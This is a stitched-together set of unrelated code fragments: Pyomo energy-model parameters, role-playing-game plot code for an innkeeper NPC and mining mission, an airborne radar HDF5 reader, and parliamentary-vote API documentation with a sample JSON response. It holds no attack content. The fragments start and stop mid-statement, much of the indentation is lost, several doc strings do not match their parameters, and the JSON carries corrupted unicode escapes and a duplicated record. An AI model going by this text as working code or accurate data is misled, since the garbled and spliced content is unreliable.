m.boiler_max_cap = pyen.Param(initialize=boil_cap,
doc='No Partload: offset is zero')
m.boiler_eff = pyen.Param(initialize=boil_eff,
doc='No Partload: offset is zero')
# chp
m.chp_elec_effic = pyen.Param(initialize=chp_elec_eff,
doc='chp ele. efficiency')
m.chp_ther_effic = pyen.Param(initialize=chp_ther_eff,
doc='No Partload: offset is zero')
m.chp_elec_max_cap = pyen.Param(initialize=chp_elec_cap,
doc='No Partload: offset is zero')
# solar
m.pv_effic = pyen.Param(initialize=pv_eff,
doc='No Partload: offset is zero')
m.pv_peak_power = pyen.Param(initialize=pv_peak_pow,
doc='No Partload: offset is zero')
m.solar = pyen.Param(m.t, initialize=1, mutable=True,
doc='No Partload: offset is zero')
# for t in m.t_UP:
# m.t_dn[t] = t_dn
# m.t_up[t] = t_dn
# | |
of a companion. This mecha packs some heavy firepower and an electronic warfare system."))
museum.contents.append(ghwaypoints.GladiusModel(desc="Since NT152, the Gladius mecha has been awarded to the winner of Snake Lake City's annual Robot Warriors competition. This makes it one of the rarest mecha in the world since only five of them have been constructed so far. The Gladius is based on a Savin frame, but has been heavily modified by the Ran Magnus workshop."))
museum.contents.append(ghwaypoints.GoldPlaque(desc="This plaque confirms that the BRONZE HORSE INN has been designated an official CAVALIER CLUB by the PRO DUELIST ASSOCIATION."))
museum.contents.append(ghwaypoints.VadelModel(desc="For sixty years the Vadel has been Earth's foremost high end sports battroid. Designed and built right here in Wujung, this mecha combines unsurpassed speed with a versatile array of powerful weapons."))
museum.contents.append(ghwaypoints.HarpyModel(desc="The Harpy transatmospheric fighter is a hybrid aerobatroid used by the Solar Navy. This is one nasty piece of work. Its heavy missiles can take down an entire lance at once, then it swoops in and picks off the survivors with twin laser cannons. Avoid avoid avoid. Unless you're the one piloting it, in which case enjoy."))
museum.contents.append(ghwaypoints.ClaymoreModel(desc="The Claymore holds the distinction of being the oldest mecha design still in production. It may be heavy and slow, but it is also well armored and usually loaded with enough firepower to raze a small city."))
self.team3 = self.register_element("MUSEUM_TEAM", teams.Team(name="Museum Team"))
museum.contents.append(self.team3)
# Add the elevator to the guest rooms- this can be used by subplots to also visit lancemate rooms and other stuff.
osmund = gears.base.Character(name="Osmund", statline={gears.stats.Reflexes: 17,
gears.stats.Body: 16, gears.stats.Speed: 14,
gears.stats.Perception: 13,
gears.stats.Knowledge: 13, gears.stats.Craft: 7,
gears.stats.Ego: 9,
gears.stats.Charm: 15, gears.stats.MechaPiloting: 7,
gears.stats.MechaGunnery: 7,
gears.stats.MechaFighting: 7,
gears.stats.Negotiation: 8}, birth_year=102,
portrait='card_m_osmund.png',
personality=[personality.Sociable, personality.Passionate, personality.Fellowship,
personality.DeadZone],
colors=(gears.color.Straw, gears.color.TannedSkin, gears.color.PlasmaBlue,
gears.color.Gold, gears.color.AceScarlet),
gender=gears.genderobj.Gender.get_default_male(),
job=gears.jobs.ALL_JOBS["Innkeeper"], renown=65, combatant=True)
team2.contents.append(osmund)
self.register_element("INNKEEPER", osmund)
self.did_intro = False
self.told_about_services = False
self.gave_mission = False
self.opened_gym = False
self.training = services.SkillTrainer((gears.stats.Vitality, gears.stats.Concentration, gears.stats.Athletics,
gears.stats.Dodge, gears.stats.CloseCombat, gears.stats.RangedCombat))
self.mission_seed = missionbuilder.BuildAMissionSeed(
nart.camp,"Help Osmund's Friend",self.elements["METROSCENE"],self.elements["MISSION_GATE"],
objectives=(missionbuilder.BAMO_CAPTURE_THE_MINE,missionbuilder.BAMO_NEUTRALIZE_ALL_DRONES),cash_reward=500,
architecture = gharchitecture.MechaScaleSemiDeadzone(),
enemy_faction=plotutility.RandomBanditCircle(nart.camp),
win_message = "You have liberated the mining camp from the bandits who stole it.",
one_chance = False, on_win=self._win_mine_mission
)
self.osmund_info = (
OneShotInfoBlast("cavaliers",
"Freelance mecha pilots. Some people prefer the term mercenaries, or adventurers. Cavalier is what I used to call myself back when I was doing that sort of work."),
OneShotInfoBlast("the Bronze Horse",
"In PreZero times, around this area, a bronze medallion with a horse on it was the symbol of a special agent. These agents were heroes of the common people; they'd go around fixing problems and punishing the slagheads who abused their power. Kind of like cavaliers do today."),
OneShotInfoBlast("lancemates",
"You won't get very far around here if you try running off by yourself; you'll get even less far if you head out into the dead zone. Try talking to some of the pilots here and see if you can get them to join you. Come back and see me when you get three lancemates and I may have some work for you."),
OneShotInfoBlast("the dead zone",
"Well, the dead zone is kind of a funny name, because really it's a whole lot of different places. All that area to the west of here, where life hasn't really recovered since the Night of Fire. Of course that doesn't mean there's nobody there. I'm from the dead zone myself, originally."),
OneShotInfoBlast("the Night of Fire",
"You didn't pay much attention in school, did you? The nuclear war that ended the Age of Superpowers and created the world as we knows it now. They say that two thirds of everybody alive was dead in a week."),
)
# Create the athlete.
self.register_element("TRAINER", gears.selector.random_character(35, camp=nart.camp, job=gears.jobs.ALL_JOBS["Athlete"]))
self.add_sub_plot(nart, "DZD_BHIRandomLancemate")
self.add_sub_plot(nart, "DZD_BHIRandomLancemate")
#self.add_sub_plot(nart, "DZD_BHIRandomLancemate")
return True
    def _do_intro(self, camp):
        # Offer effect: record that the innkeeper's introduction was given,
        # so INNKEEPER_offers switches to the short greeting.
        self.did_intro = True
    def _tell_about_services(self, camp):
        # Offer effect: record that the hotel services pitch was delivered,
        # removing that info offer from future conversations.
        self.told_about_services = True
    def INNKEEPER_offers(self, camp: gears.GearHeadCampaign):
        # Build the innkeeper's dialogue offers: greeting, services info,
        # the mine-mission chain (gated on 3+ lancemates), one-shot info
        # blasts, and the gym/trainer reveal after speaking to Ran.
        mylist = list()
        # Greeting: short spiel after the intro, full pitch the first time.
        if self.did_intro:
            mylist.append(Offer("[HELLO] [_BRONZE_HORSE_SPIEL]",
                                context=ContextTag([context.HELLO]),
                                ))
        else:
            mylist.append(Offer(
                "[HELLO] I am the owner of the Bronze Horse Inn; our facilities were designed especially for cavaliers. If you need a place to stay or just want to pick up some lancemates you've come to the right place.",
                context=ContextTag([context.HELLO]), effect=self._do_intro
            ))
        if not self.told_about_services:
            mylist.append(Offer("While you rest in one of our suites, your mecha will be taken care of in our offsite hangar with full repair and customization services. We have a physical training room, a mecha museum, and a twenty four hour breakfast buffet. It's everything a cavalier could want.",
                                context=ContextTag([context.INFO]), effect=self._tell_about_services,
                                data={"subject": "your services"}, no_repeats=True,
                                ))
        # Mission chain: offered once, only after the player has recruited
        # at least three lancemates.
        if self.did_intro and not self.gave_mission and len(camp.get_lancemates()) >= 3:
            mylist.append(Offer("[HELLO] You know, A friend of mine has a problem that you might be able to help with...",
                                context=ContextTag([context.HELLO]),
                                ))
            mylist.append(
                Offer("A buddy of mine from back home set up a robotic mining operation just outside of Last Hope. Unfortunately, as soon as she started hitting the good stuff, a gang of bandits rolled in and took over the site for themselves. What I'd like you to do is go clear 'em out.",
                      context=ContextTag([context.MISSION]),subject=self,subject_start=True
                      ))
            mylist.append(
                Offer(
                    "Fantastic. You can access the mission by heading to the West Gate of Wujung and following the nav coordinates I'm sending to you now. [GOODLUCK]",
                    context=ContextTag([context.ACCEPT]), subject=self, effect=self._accept_mission
                ))
            mylist.append(
                Offer(
                    "[UNDERSTOOD] You're going to want to keep your eyes open for mission offers, though, since they're the main way for cavaliers to earn money.",
                    context=ContextTag([context.DENY]), subject=self, effect=self._deny_mission
                ))
        # One-shot lore info blasts, shown until each has been used.
        for inf in self.osmund_info:
            if inf.active:
                mylist.append(inf.build_offer())
        # After the player has spoken to Ran Magnus, reveal the trainer.
        if camp.campdata.get("CD_SPOKE_TO_RAN", None) and not self.opened_gym:
            #if not self.opened_gym:
            mylist.append(
                Offer(
                    "Oh yeah, Ran and I go way back. We were lancemates back in the twenties. She's a good person to know if you're a cavalier.\n I'll tell you another good person to know- the hotel's personal trainer {TRAINER}. You can probably find {TRAINER.gender.object_pronoun} in the museum.".format(**self.elements),
                    context=ContextTag([context.CUSTOM]), data={"reply": "You didn't tell us that the mission you gave was for Ran Magnus!"}, effect=self._open_gym
                ))
            #ghdialogue.TagBasedPartyReply(
            #    Offer(
            #        "Ran and I used to be in the same lance. Of course that was years before she set up her mecha factory, and I eventually set up this hotel...",
            #        context=ContextTag([context.INFO]),data={"subject": "Ran Magnus"}, no_repeats=True,
            #    ), camp, mylist, [gears.tags.Academic]
            #)
        return mylist
def _open_gym(self, camp):
self.opened_gym = True
my_scene: gears.GearHeadScene = self.elements["INTERIOR"]
my_scene.deploy_team([self.elements["TRAINER"]], self.team3)
    def _accept_mission(self,camp):
        # Offer effect: pop the new-mission notification at the gate and
        # mark the mission as handed out.
        missionbuilder.NewMissionNotification(self.mission_seed.name,self.elements["MISSION_GATE"])
        self.gave_mission = True
    def _deny_mission(self,camp):
        # Offer effect: the player refused; mark as given and discard the
        # seed so the mission can never be taken.
        self.gave_mission = True
        self.mission_seed = None
    def MISSION_GATE_menu(self, camp, thingmenu):
        # Plot hook: list the mine mission on the gate's menu once it has
        # been offered and while it still exists.
        if self.mission_seed and self.gave_mission:
            thingmenu.add_item(self.mission_seed.name, self.mission_seed)
    def _win_mine_mission(self, camp: gears.GearHeadCampaign):
        # Mission callback: flag the campaign so other plots can react to
        # the mine being liberated.
        camp.campdata["MINE_MISSION_WON"] = True
def t_UPDATE(self, camp):
# If the adventure has ended, get rid of it.
if self.mission_seed and self.mission_seed.ended:
self.mission_seed = None
    def _get_dialogue_grammar(self, npc, camp):
        # Supply extra dialogue grammar while the party is at this location.
        mygram = dict()
        if camp.scene.get_root_scene() is self.elements["LOCALE"]:
            # The party is inside the inn: provide the innkeeper's stock
            # greeting lines used by the [_BRONZE_HORSE_SPIEL] token.
            mygram["[_BRONZE_HORSE_SPIEL]"] = [
                "Let me know if you need any help.", "Have you met the other cavaliers staying here?",
                "I hope you enjoy your stay at the Bronze Horse Inn.",
                "This is the best place in town to find lancemates."
            ]
        return mygram
def TRAINER_offers(self, camp: gears.GearHeadCampaign):
mylist = list()
mylist.append(Offer(
"Let's get started. No pain, no gain.",
context=ContextTag((context.OPEN_SCHOOL,)), effect=self.training,
))
return mylist
# ********************************
# *** DZD_BHIRandomLancemate ***
# ********************************
#
# A random lancemate for the Bronze Horse Inn in Wujung.
class DZD_BHIRandomLancemate(Plot):
    # A randomly generated potential lancemate staying at the Bronze Horse Inn.
    # NOTE(review): several plot classes below share this LABEL, presumably so
    # the plot loader picks one variant at random — confirm against the loader.
    LABEL = "DZD_BHIRandomLancemate"
    UNIQUE = True
    def custom_init(self, nart):
        # Create a combat-capable NPC of moderate rank, drop them in either the
        # museum or the foyer, and attach a random relationship subplot.
        npc = gears.selector.random_character(rank=random.randint(10, 50),
                                              mecha_colors=gears.color.random_mecha_colors(),
                                              local_tags=tuple(self.elements["LOCALE"].attributes),
                                              combatant=True)
        self.register_element("NPC", npc, dident=random.choice(("MUSEUM_TEAM","FOYER_TEAM")))
        self.add_sub_plot(nart, "RLM_Relationship")
        return True
class DZD_BHIAdventurer(Plot):
    # A combat-profession lancemate candidate for the Bronze Horse Inn; shares
    # the DZD_BHIRandomLancemate label so it can be chosen as one of the
    # random-lancemate variants.
    LABEL = "DZD_BHIRandomLancemate"
    UNIQUE = True
    # Professions this variant can roll; all are combat-oriented jobs.
    JOBS = ("Soldier", "Mecha Pilot", "Scavenger", "Arena Pilot", "Martial Artist", "Test Pilot", "Mercenary")
    def custom_init(self, nart):
        # Same recipe as DZD_BHIRandomLancemate, but with a job drawn from JOBS
        # and always placed in the foyer.
        npc = gears.selector.random_character(job=gears.jobs.ALL_JOBS[random.choice(self.JOBS)],
                                              rank=random.randint(10, 50),
                                              mecha_colors=gears.color.random_mecha_colors(),
                                              local_tags=tuple(self.elements["LOCALE"].attributes),
                                              combatant=True)
        self.register_element("NPC", npc, dident="FOYER_TEAM")
        self.add_sub_plot(nart, "RLM_Relationship")
        return True
class DZD_BHIScout(Plot):
    # A scout/rogue-profession lancemate candidate for the Bronze Horse Inn;
    # shares the DZD_BHIRandomLancemate label with the other variants.
    LABEL = "DZD_BHIRandomLancemate"
    UNIQUE = True
    # Professions this variant can roll; all are recon/stealth-flavored jobs.
    JOBS = ("Bounty Hunter", "Recon Pilot", "Thief", "Explorer")
    def custom_init(self, nart):
        # Create the NPC with a scout job, place them in the museum or foyer,
        # and attach a random relationship subplot.
        npc = gears.selector.random_character(job=gears.jobs.ALL_JOBS[random.choice(self.JOBS)],
                                              rank=random.randint(10, 50),
                                              mecha_colors=gears.color.random_mecha_colors(),
                                              local_tags=tuple(self.elements["LOCALE"].attributes),
                                              combatant=True)
        self.register_element("NPC", npc, dident=random.choice(("MUSEUM_TEAM","FOYER_TEAM")))
        self.add_sub_plot(nart, "RLM_Relationship")
        return True
class DZD_BlueFortressHQ(Plot):
LABEL = "DZDHB_BlueFortress"
active = True
scope = "METRO"
# Compatibility var- for v0.540
got_tutorial = False
def custom_init(self, nart):
| |
beam filling (NUBF) offset used to correct Ku-band Doppler velocity (m/s)
- channel_mask (range, time): xarray.DataArray(int) - Composite image channel mask. 0: No signal, 1: Low-resolution pulse, 2: High-resolution pulse, 3: Chirp
- horizontal_resolution_ku (range) : xarray.DataArray(float) - Approximate horizontal resolution defined as width of spatial weighting after averaging as a function of radar range (m)
- dxdr (time) : xarray.DataArray(float) - Data cross-track distance from aircraft per radar range. Positive is starboard direction (m/m)
- dydr (time) : xarray.DataArray(float) - Data along-track distance from aircraft per radar range. Positive is forward direction (m/m)
- dzdr (time) : xarray.DataArray(float) - Data vertical distance from aircraft per radar range. Positive is upward direction (m/m)
- er2_altitude (time) : xarray.DataArray(float) - Aircraft height above sea level (m)
- er2_heading (time) : xarray.DataArray(float) - Aircraft heading in degrees from north. 90 degrees is eastward pointing (degrees)
- er2_pitch (time) : xarray.DataArray(float) - Aircraft pitch (degrees)
- er2_roll (time) : xarray.DataArray(float) - Aircraft roll (degrees)
- er2_drift (time) : xarray.DataArray(float) - Distance between track and heading (degrees)
- er2_EastVel (time) : xarray.DataArray(float) - Eastward component of velocity (m/s)
- er2_NorthVel (time) : xarray.DataArray(float) - Northward component of velocity (m/s)
- er2_upVel (time) : xarray.DataArray(float) - Upward velocity (m/s)
- er2_track (time) : xarray.DataArray(float) - Direction from motion in degrees from north. 90 degrees is eastward motion (degrees)
            - er2_motion (time)          : xarray.DataArray(float) - Estimated aircraft motion normal to the beam, subtracted from Doppler estimate. Smoothed to a 2 second average motion (m/s)
Attribute Information:
Experiment, Date, Aircraft, Radar Name, Data Contact, Instrument PI, Mission PI, Antenna Size,
Antenna one-way 3dB beamwidth (degrees), Number of pulses, Radar transmit frequency (Hz), Radar transmit wavelength (m),
Range gate spacing (m), Nominal antenna pointing, PRI, vertical resolution
"""
# correct for 2-way path integrated attenuation
if atten_file is not None:
self.correct_attenuation(atten_file)
# mask values when aircraft is rolling
if max_roll is not None:
self.data = self.mask_roll(max_roll)
# despeckle
if dbz_sigma is not None:
self.data['dbz'] = self.despeckle(self.data['dbz'], dbz_sigma)
if vel_sigma is not None:
self.data['vel'] = self.despeckle(self.data['vel'], vel_sigma)
if width_sigma is not None:
self.data['width'] = self.despeckle(self.data['width'], width_sigma)
if ldr_sigma is not None:
self.data['ldr'] = self.despeckle(self.data['ldr'], ldr_sigma)
def readfile(self, filepath, start_time=None, end_time=None):
"""
Reads the CRS data file and unpacks the fields into an xarray.Dataset
Parameters
----------
filepath : str
Path to the data file
start_time : np.datetime64 or None
The initial time of interest
end_time : np.datetime64 or None
The final time of interest
Returns
-------
data : xarray.Dataset
The unpacked dataset
"""
# open the file
hdf = h5py.File(filepath, 'r')
# Time information -- this is the first dimension in nav coords and products
time_raw = hdf['Time']['Data']['TimeUTC'][:]
time_dt = [datetime(1970, 1, 1) + timedelta(seconds=time_raw[i]) for i in range(len(time_raw))] # Python datetime object
time_dt64 = np.array(time_dt, dtype='datetime64[ms]') # Numpy datetime64 object (e.g., for plotting)
if start_time is not None:
time_inds = np.where((time_dt64>=start_time) & (time_dt64<=end_time))[0]
else:
time_inds = np.where((time_dt64 != None))[0]
# Aircraft nav information
nomdist = xr.DataArray(
data = hdf['Navigation']['Data']['NominalDistance'][:],
dims = ["time"],
coords = dict(time=time_dt64),
attrs = dict(
description=hdf['Navigation']['Information']['NominalDistance_desciption'][0].decode('UTF-8'),
units = hdf['Navigation']['Information']['NominalDistance_units'][0].decode('UTF-8')
)
)
lat = xr.DataArray(
data = hdf['Navigation']['Data']['Latitude'][:],
dims = ["time"],
coords = dict(
time = time_dt64,
distance = nomdist),
attrs = dict(
description = hdf['Navigation']['Information']['Latitude_description'][0].decode('UTF-8'),
units = hdf['Navigation']['Information']['Latitude_units'][0].decode('UTF-8')
)
)
lon = xr.DataArray(
data = hdf['Navigation']['Data']['Longitude'][:],
dims = ["time"],
coords = dict(
time = time_dt64,
distance = nomdist),
attrs = dict(
description=hdf['Navigation']['Information']['Longitude_description'][0].decode('UTF-8'),
units = hdf['Navigation']['Information']['Longitude_units'][0].decode('UTF-8')
)
)
altitude = xr.DataArray(
data = hdf['Navigation']['Data']['Height'][:],
dims = ["time"],
coords = dict(
time = time_dt64,
distance = nomdist),
attrs = dict(
description=hdf['Navigation']['Information']['Height_description'][0].decode('UTF-8'),
units = hdf['Navigation']['Information']['Height_units'][0].decode('UTF-8')
)
)
heading = xr.DataArray(
data = hdf['Navigation']['Data']['Heading'][:],
dims = ["time"],
coords = dict(
time = time_dt64,
distance = nomdist),
attrs = dict(
description=hdf['Navigation']['Information']['Heading_description'][0].decode('UTF-8'),
units = hdf['Navigation']['Information']['Heading_units'][0].decode('UTF-8')
)
)
roll = xr.DataArray(
data = hdf['Navigation']['Data']['Roll'][:],
dims = ["time"],
coords = dict(
time = time_dt64,
distance = nomdist),
attrs = dict(
description=hdf['Navigation']['Information']['Roll_description'][0].decode('UTF-8'),
units = hdf['Navigation']['Information']['Roll_units'][0].decode('UTF-8')
)
)
pitch = xr.DataArray(
data = hdf['Navigation']['Data']['Pitch'][:],
dims = ["time"],
coords = dict(
time = time_dt64,
distance = nomdist),
attrs = dict(
description=hdf['Navigation']['Information']['Pitch_description'][0].decode('UTF-8'),
units = hdf['Navigation']['Information']['Pitch_units'][0].decode('UTF-8')
)
)
drift = xr.DataArray(
data = hdf['Navigation']['Data']['Drift'][:],
dims = ["time"],
coords = dict(
time = time_dt64,
distance = nomdist),
attrs = dict(
description=hdf['Navigation']['Information']['Drift_description'][0].decode('UTF-8'),
units = hdf['Navigation']['Information']['Drift_units'][0].decode('UTF-8')
)
)
eastVel = xr.DataArray(
data = hdf['Navigation']['Data']['EastVelocity'][:],
dims = ["time"],
coords = dict(
time = time_dt64,
distance = nomdist),
attrs = dict(
description=hdf['Navigation']['Information']['EastVelocity_description'][0].decode('UTF-8'),
units = hdf['Navigation']['Information']['EastVelocity_units'][0].decode('UTF-8')
)
)
northVel = xr.DataArray(
data = hdf['Navigation']['Data']['NorthVelocity'][:],
dims = ["time"],
coords = dict(
time = time_dt64,
distance = nomdist),
attrs = dict(
description=hdf['Navigation']['Information']['NorthVelocity_description'][0].decode('UTF-8'),
units = hdf['Navigation']['Information']['NorthVelocity_units'][0].decode('UTF-8')
)
)
track = xr.DataArray(
data = hdf['Navigation']['Data']['Track'][:],
dims = ["time"],
coords = dict(
time = time_dt64,
distance = nomdist),
attrs = dict(
description=hdf['Navigation']['Information']['Track_description'][0].decode('UTF-8'),
units = hdf['Navigation']['Information']['Track_units'][0].decode('UTF-8')
)
)
upvel = xr.DataArray(
data = hdf['Navigation']['Data']['UpVelocity'][:],
dims = ["time"],
coords = dict(
time = time_dt64,
distance = nomdist),
attrs = dict(
description=hdf['Navigation']['Information']['UpVelocity_description'][0].decode('UTF-8'),
units = hdf['Navigation']['Information']['UpVelocity_units'][0].decode('UTF-8')
)
)
dxdr = xr.DataArray(
data = hdf['Navigation']['Data']['dxdr'][:],
dims = ["time"],
coords = dict(
time = time_dt64,
distance = nomdist),
attrs = dict(
description=hdf['Navigation']['Information']['dxdr_description'][0].decode('UTF-8'),
units = hdf['Navigation']['Information']['dxdr_units'][0].decode('UTF-8')
)
)
dydr = xr.DataArray(
data = hdf['Navigation']['Data']['dydr'][:],
dims = ["time"],
coords = dict(
time = time_dt64,
distance = nomdist),
attrs = dict(
description=hdf['Navigation']['Information']['dydr_description'][0].decode('UTF-8'),
units = hdf['Navigation']['Information']['dydr_units'][0].decode('UTF-8')
)
)
dzdr = xr.DataArray(
data = hdf['Navigation']['Data']['dzdr'][:],
dims = ["time"],
coords = dict(
time = time_dt64,
distance = nomdist),
attrs = dict(
description=hdf['Navigation']['Information']['dzdr_description'][0].decode('UTF-8'),
units = hdf['Navigation']['Information']['dzdr_units'][0].decode('UTF-8')
)
)
# Radar information
radar_range = hdf['Products']['Information']['Range'][:] # this is the second dimension on product data
[alt2d, radar_range2d] = np.meshgrid(altitude, radar_range)
hght = alt2d - radar_range2d
height = xr.DataArray(
data = hght[:],
dims = ['range', 'time'],
coords = dict(
range = radar_range,
time = time_dt64,
distance = nomdist,
lat = lat,
lon = lon),
attrs = dict(
description='Height of each radar range gate',
units='m'
)
)
dbz = xr.DataArray(
data = hdf['Products']['Data']['dBZe'][:].T,
dims = ["range", "time"],
coords = dict(
range = radar_range,
height = height,
time = time_dt64,
distance = nomdist,
lat = lat,
lon = lon),
attrs = dict(
description=hdf['Products']['Information']['dBZe_description'][0].decode('UTF-8'),
units = hdf['Products']['Information']['dBZe_units'][0].decode('UTF-8')
)
)
width = xr.DataArray(
data = np.ma.masked_invalid(hdf['Products']['Data']['SpectrumWidth'][:].T),
dims = ["range", "time"],
coords = dict(
range = radar_range,
height = height,
time = time_dt64,
distance = nomdist,
lat = lat,
lon = lon),
attrs = dict(
description=hdf['Products']['Information']['SpectrumWidth_description'][0].decode('UTF-8'),
units = hdf['Products']['Information']['SpectrumWidth_units'][0].decode('UTF-8')
)
)
if 'Velocity_corrected' in list(hdf['Products']['Data'].keys()):
# for NUBF correction
vel = xr.DataArray(
data = hdf['Products']['Data']['Velocity_corrected'][:].T,
dims = ["range", "time"],
coords = dict(
range = radar_range,
height = height,
time = time_dt64,
distance = nomdist,
lat = lat,
lon = lon),
attrs = dict(
description=hdf['Products']['Information']['Velocity_corrected_description'][0].decode('UTF-8'),
units = hdf['Products']['Information']['Velocity_corrected_units'][0].decode('UTF-8')
)
)
else:
vel = xr.DataArray(
data = hdf['Products']['Data']['Velocity'][:].T,
dims = ["range", "time"],
coords = dict(
range = radar_range,
height = height,
time = time_dt64,
distance = nomdist,
lat = lat,
lon = lon),
attrs = dict(
description=hdf['Products']['Information']['Velocity_description'][0].decode('UTF-8'),
units = hdf['Products']['Information']['Velocity_units'][0].decode('UTF-8')
)
)
aircraft_motion = xr.DataArray(
data = hdf['Products']['Information']['AircraftMotion'][:,0],
dims = ["time"],
coords = dict(
time = time_dt64,
distance = nomdist,
lat = lat,
lon = lon),
attrs = dict(
description=hdf['Products']['Information']['AircraftMotion_description'][0].decode('UTF-8'),
units = hdf['Products']['Information']['AircraftMotion_units'][0].decode('UTF-8')
)
)
mask_copol = xr.DataArray(
data = hdf['Products']['Information']['MaskCoPol'][:].T,
dims = ["range","time"],
coords = dict(
range = radar_range,
height = height,
time = time_dt64,
distance = nomdist,
lat = lat,
lon = lon),
attrs = dict(
description = hdf['Products']['Information']['MaskCoPol_description'][0].decode('UTF-8'),
)
)
horiz_resolution = xr.DataArray(
data = hdf['Products']['Information']['ResolutionHorizontal6dB'][:],
dims = ["range"],
coords = dict(
range = radar_range),
attrs = dict(
description=hdf['Products']['Information']['ResolutionHorizontal6dB_description'][0].decode('UTF-8'),
units = hdf['Products']['Information']['ResolutionHorizontal6dB_units'][0].decode('UTF-8')
)
)
vel_horizwind_offset = xr.DataArray(
data = hdf['Products']['Information']['Velocity_horizwind_offset'][:].T,
dims = ["range","time"],
coords = dict(
range = radar_range,
height = height,
time = time_dt64,
distance = nomdist,
lat = lat,
lon = lon),
attrs = dict(
description=hdf['Products']['Information']['Velocity_horizwind_offset_description'][0].decode('UTF-8'),
units = hdf['Products']['Information']['Velocity_horizwind_offset_units'][0].decode('UTF-8')
)
)
# get meta data for attributes
aircraft = hdf['Information']['Aircraft'][0].decode('UTF-8')
dataContact = hdf['Information']['DataContact'][0].decode('UTF-8')
experiment | |
this vote
* @apiSuccess {Integer} results.results.abstain Number of abstentions
* @apiSuccess {Integer} results.results.against Number of MPs who voted against the motion
* @apiSuccess {Integer} results.results.not_present Number of MPs who weren't present at the vote
* @apiSuccess {Integer} results.results.votes_for Number of MPs who voted for the motion
* @apiSuccess {date} results.results.date The date of the vote
* @apiSuccess {String} results.results.text The text of the motion which was voted upon
* @apiSuccess {String[]} results.results.tags List of tags that belong to this motion
* @apiSuccess {Boolean} results.results.is_outlier Is this vote a weird one (flame icon)?
* @apiSuccess {Boolean} results.results.result Did the motion pass?
* @apiExample {curl} Example:
curl -i https://analize.parlameter.si/v1/s/getComparedVotes/?people_same=&parties_same=1&people_different=&parties_different=2
* @apiSuccessExample {json} Example response:
{
"total": 2155,
"results": [{
"session": {
"name": "44. <NAME>",
"date_ts": "2017-05-30T02:00:00",
"orgs": [{
"acronym": "DZ",
"is_coalition": false,
"id": 95,
"name": "Dr\u017<NAME>"
}],
"date": "30. 5. 2017",
"org": {
"acronym": "DZ",
"is_coalition": false,
"id": 95,
"name": "Dr\u017<NAME>"
},
"id": 9587,
"in_review": false
},
"results": {
"abstain": 0,
"against": 0,
"motion_id": 7260,
"date": "09.06.2017",
"text": "Dnevni red v celoti",
"tags": ["Proceduralna glasovanja"],
"is_outlier": false,
"not_present": 34,
"votes_for": 56,
"result": true
}
}, {
"session": {
"name": "<NAME>",
"date_ts": "2017-05-30T02:00:00",
"orgs": [{
"acronym": "DZ",
"is_coalition": false,
"id": 95,
"name": "Dr\u017<NAME>"
}],
"date": "30. 5. 2017",
"org": {
"acronym": "DZ",
"is_coalition": false,
"id": 95,
"name": "Dr\u017<NAME>"
},
"id": 9587,
"in_review": false
},
"results": {
"abstain": 0,
"against": 34,
"motion_id": 7258,
"date": "09.06.2017",
"text": "Priporo\u010dilo Vladi RS v zvezi z okoljsko katastrofo, ki jo je povzro\u010dil po\u017ear v podjetju Kemis d.o.o. - Amandma: k 5. to\u010dki 9.6.2017 [SDS - Poslanska skupina Slovenske demokratske stranke]",
"tags": ["Odbor za infrastrukturo, okolje in prostor"],
"is_outlier": false,
"not_present": 35,
"votes_for": 21,
"result": false
}
}, {
"session": {
"name": "<NAME>",
"date_ts": "2017-05-22T02:00:00",
"orgs": [{
"acronym": "DZ",
"is_coalition": false,
"id": 95,
"name": "Dr\u017<NAME>"
}],
"date": "22. 5. 2017",
"org": {
"acronym": "DZ",
"is_coalition": false,
"id": 95,
"name": "Dr\u017<NAME>"
},
"id": 9580,
"in_review": true
},
"results": {
"abstain": 4,
"against": 18,
"motion_id": 7219,
"date": "30.05.2017",
"text": "Zakon o dopolnitvi Zakona o omejevanju uporabe toba\u010dnih in povezanih izdelkov - Glasovanje o zakonu v celoti",
"tags": ["Odbor za zdravstvo"],
"is_outlier": false,
"not_present": 16,
"votes_for": 52,
"result": true
}
}, {
"session": {
"name": "<NAME>",
"date_ts": "2017-05-22T02:00:00",
"orgs": [{
"acronym": "DZ",
"is_coalition": false,
"id": 95,
"name": "Dr\u01<NAME>"
}],
"date": "22. 5. 2017",
"org": {
"acronym": "DZ",
"is_coalition": false,
"id": 95,
"name": "Dr\u01<NAME>"
},
"id": 9580,
"in_review": true
},
"results": {
"abstain": 6,
"against": 23,
"motion_id": 7218,
"date": "30.05.2017",
"text": "Zakon o spremembah in dopolnitvah Zakona o zdravstveni dejavnosti - Eviden\u010dni sklep o primernosti predloga zakona 30.5.2017",
"tags": ["Odbor za zdravstvo"],
"is_outlier": false,
"not_present": 19,
"votes_for": 42,
"result": true
}
}, {
"session": {
"name": "<NAME>",
"date_ts": "2017-05-22T02:00:00",
"orgs": [{
"acronym": "DZ",
"is_coalition": false,
"id": 95,
"name": "Dr\u017<NAME>"
}],
"date": "22. 5. 2017",
"org": {
"acronym": "DZ",
"is_coalition": false,
"id": 95,
"name": "Dr\u01<NAME>"
},
"id": 9580,
"in_review": true
},
"results": {
"abstain": 6,
"against": 23,
"motion_id": 7218,
"date": "30.05.2017",
"text": "Zakon o spremembah in dopolnitvah Zakona o zdravstveni dejavnosti - Eviden\u010dni sklep o primernosti predloga zakona 30.5.2017",
"tags": ["Odbor za zdravstvo"],
"is_outlier": false,
"not_present": 19,
"votes_for": 42,
"result": true
}
}, {
"session": {
"name": "<NAME>",
"date_ts": "2017-05-22T02:00:00",
"orgs": [{
"acronym": "DZ",
"is_coalition": false,
"id": 95,
"name": "Dr\u01<NAME>"
}],
"date": "22. 5. 2017",
"org": {
"acronym": "DZ",
"is_coalition": false,
"id": 95,
"name": "Dr\u017<NAME>"
},
"id": 9580,
"in_review": true
},
"results": {
"abstain": 3,
"against": 22,
"motion_id": 7217,
"date": "30.05.2017",
"text": "Priporo\u010dilo v zvezi s problematiko slovenskega zdravstva - Eviden\u010dni sklep MDT 30.5.2017",
"tags": ["Odbor za zdravstvo"],
"is_outlier": false,
"not_present": 14,
"votes_for": 51,
"result": true
}
}, {
"session": {
"name": "<NAME>",
"date_ts": "2017-05-22T02:00:00",
"orgs": [{
"acronym": "DZ",
"is_coalition": false,
"id": 95,
"name": "Dr\u01<NAME>"
}],
"date": "22. 5. 2017",
"org": {
"acronym": "DZ",
"is_coalition": false,
"id": 95,
"name": "Dr\u01<NAME>"
},
"id": 9580,
"in_review": true
},
"results": {
"abstain": 2,
"against": 51,
"motion_id": 7216,
"date": "30.05.2017",
